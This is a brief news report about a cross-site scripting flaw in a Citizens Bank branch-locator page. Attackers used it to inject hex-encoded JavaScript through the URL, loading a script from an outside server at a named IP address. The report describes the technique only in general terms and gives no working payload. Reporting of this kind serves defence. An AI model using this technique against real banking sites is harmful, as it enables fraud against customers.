Online Banking Industry Very Vulnerable to Cross-Site Scripting Frauds
The script being exploited allows visitors to search for Citizens Bank branch offices in their town. Along with search scripts, branch locator pages are frequently carelessly coded and are targets for fraudsters who are actively analyzing financial web sites for weaknesses.
In this case, a coding oversight in the Citizens Bank application allows an attacker to inject JavaScript into the URL, which is executed by customers' web browsers. The additional commands following "CitizensBank.com" in the URL are hex-coded to evade detection, but call a JavaScript file (city.js) from a server at the IP address 82.184.108.158.
The link for this article located at netcraft.com is no longer available.